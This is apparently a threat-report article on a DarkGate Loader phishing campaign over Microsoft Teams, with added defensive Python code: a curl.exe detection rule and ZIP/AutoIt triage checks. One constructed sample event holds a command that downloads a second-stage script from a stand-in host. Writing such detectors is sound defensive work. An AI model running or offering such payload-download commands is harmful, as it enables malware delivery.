The campaign began in late August 2023, when two compromised external Office 365 accounts were observed sending Microsoft Teams phishing messages to other organizations.
The accounts were used to trick Teams users at those organizations into downloading and opening a ZIP file named “Changes to the vacation schedule.”
When the recipient clicks the attachment, the ZIP file, presented as a PDF document, is downloaded from a SharePoint URL. Inside the archive is an LNK (Windows shortcut) file.
Truesec researchers who analyzed the campaign found that the Teams phishing lure launches a malicious VBScript, which starts an infection chain that ends with a payload known as the DarkGate Loader.
The download stage uses the cURL binary that ships with Windows (curl.exe) to fetch the malware’s script and executable files, a choice of a legitimate, built-in tool that helps the activity blend in and avoid detection.
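A detection engineer would want a rule for that pattern: a built-in curl.exe started by a script host, handed a URL, and told to write the response to disk. The following is an added example written for this article, not code from Truesec; it runs over constructed process-creation events (field names borrowed from Sysmon Event ID 1; hosts, paths and the 203.0.113.0/24 TEST-NET address are made up). That curl.exe is launched directly by the campaign's VBScript stage under wscript.exe is an assumption made for the example, not a detail the article reports.

```python
import re

# Script hosts that a phishing LNK/VBScript chain typically runs under. That the
# campaign's VBScript stage is what launches curl.exe is an assumption made for
# this example, not a detail reported in the article.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
OUTPUT_FLAGS = {"-o", "-O", "--output", "--remote-name"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious_curl(event):
    """True when curl.exe is spawned by a script host, given a URL, and told to
    write the response to disk: the shape of a script-driven payload download."""
    if basename(event["Image"]) != "curl.exe":
        return False
    if basename(event["ParentImage"]) not in SCRIPT_HOSTS:
        return False
    tokens = event["CommandLine"].split()
    has_url = any(URL_RE.search(t) for t in tokens)
    writes_file = any(t in OUTPUT_FLAGS for t in tokens)
    return has_url and writes_file


def detect(events):
    """Return the events that match the script-host-to-curl download pattern."""
    return [e for e in events if is_suspicious_curl(e)]


# Constructed process-creation events using Sysmon Event ID 1 field names.
# Hosts, paths and the 203.0.113.0/24 (TEST-NET-3) address are made up.
SAMPLE_EVENTS = [
    {   # script host pulling a second stage with Windows' built-in curl
        "ProcessId": 4312,
        "Image": r"C:\Windows\System32\curl.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"curl.exe -s http://203.0.113.10/stage/script.au3 -o C:\Users\Public\s.au3",
    },
    {   # interactive use from a console: same tool, no script-host parent
        "ProcessId": 5100,
        "Image": r"C:\Windows\System32\curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"curl.exe https://example.com/ -o page.html",
    },
    {   # script host spawning something other than curl
        "ProcessId": 5288,
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"notepad.exe notes.txt",
    },
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT pid=%d %s" % (hit["ProcessId"], hit["CommandLine"]))
```

Only the first sample event fires. Restricting the parent to script hosts rather than cmd.exe or powershell.exe keeps ordinary administrative use of curl.exe out of the alert stream; the trade-off is that a chain which launches curl from a different host process would need its own rule.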
The script was delivered pre-compiled, with its malicious code hidden in the middle of the file, beginning with the recognizable “magic bytes” associated with compiled AutoIt scripts.
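Two triage checks follow from the lure layout and the hidden AutoIt script described above: flag archive entries that are shortcuts dressed up as documents, and search an entire file for the compiled-AutoIt signature rather than only its header, since a signature at a non-zero offset is what an embedded script looks like. The code below is an added example, not Truesec's tooling; the sample ZIP and the sample blob are constructed here and are not real campaign artifacts. The compiled AutoIt v3 signature (“AU3!EA06”) and the Shell Link header are documented format facts, not something the article states.

```python
import io
import os
import zipfile

# Signature at the start of a compiled AutoIt v3 script. Truesec reported that the
# loader's compiled script is buried in the middle of the delivered file, so a
# header-only check misses it; the scan below searches the whole buffer.
AUTOIT_COMPILED_MAGIC = b"AU3!EA06"

# Shell Link header: HeaderSize 0x4C followed by the ShellLink CLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk (little-endian) byte order.
LNK_HEADER = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}
EXECUTABLE_EXTENSIONS = {".lnk", ".vbs", ".js", ".wsf", ".hta", ".exe", ".scr"}


def triage_zip(zip_bytes):
    """Return (entry_name, reason) pairs for archive entries that look like a lure.

    Flags executable or shortcut entries, especially ones whose name is dressed up
    as a document ("report.pdf.lnk"), and entries whose content is a Windows
    shortcut even though the extension says otherwise.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            stem, ext = os.path.splitext(name.lower())
            inner_ext = os.path.splitext(stem)[1]
            if ext in EXECUTABLE_EXTENSIONS:
                reason = "executable entry " + ext
                if inner_ext in DOCUMENT_EXTENSIONS:
                    reason = "document-looking name with executable extension " + ext
                findings.append((name, reason))
            if ext != ".lnk" and zf.read(name).startswith(LNK_HEADER):
                findings.append((name, "Windows shortcut content under a " + ext + " extension"))
    return findings


def find_autoit_script(data):
    """Offset of the first compiled-AutoIt signature in data, or -1 if absent.

    A non-zero offset means the script is embedded inside another file, which is
    the layout described for the DarkGate loader's delivered script.
    """
    return data.find(AUTOIT_COMPILED_MAGIC)


# --- constructed samples (not real campaign artifacts) ---------------------------

def build_sample_zip():
    """A ZIP holding one shortcut named like a PDF, mirroring the lure's layout."""
    fake_lnk = LNK_HEADER + b"\x00" * 56  # header only; a real LNK carries more structures
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Changes to the vacation schedule.pdf.lnk", fake_lnk)
    return buf.getvalue()


def build_sample_autoit_blob():
    """A blob with the AutoIt signature hidden after 72 bytes of filler."""
    return b"MZ" + b"\x00" * 70 + AUTOIT_COMPILED_MAGIC + b"\x01\x02\x03\x04"


if __name__ == "__main__":
    for entry, why in triage_zip(build_sample_zip()):
        print("ZIP:", entry, "->", why)
    print("AutoIt signature at offset", find_autoit_script(build_sample_autoit_blob()))
```

Against the sample archive the triage reports the shortcut entry once, for its document-looking double extension; against the sample blob the signature is found at offset 72, which is the embedded case, while a plain compiled script would report offset 0 and a clean file -1. Matching the signature alone does not prove the bytes are a live script, so a hit is a reason to carve from that offset and inspect, not a verdict on its own.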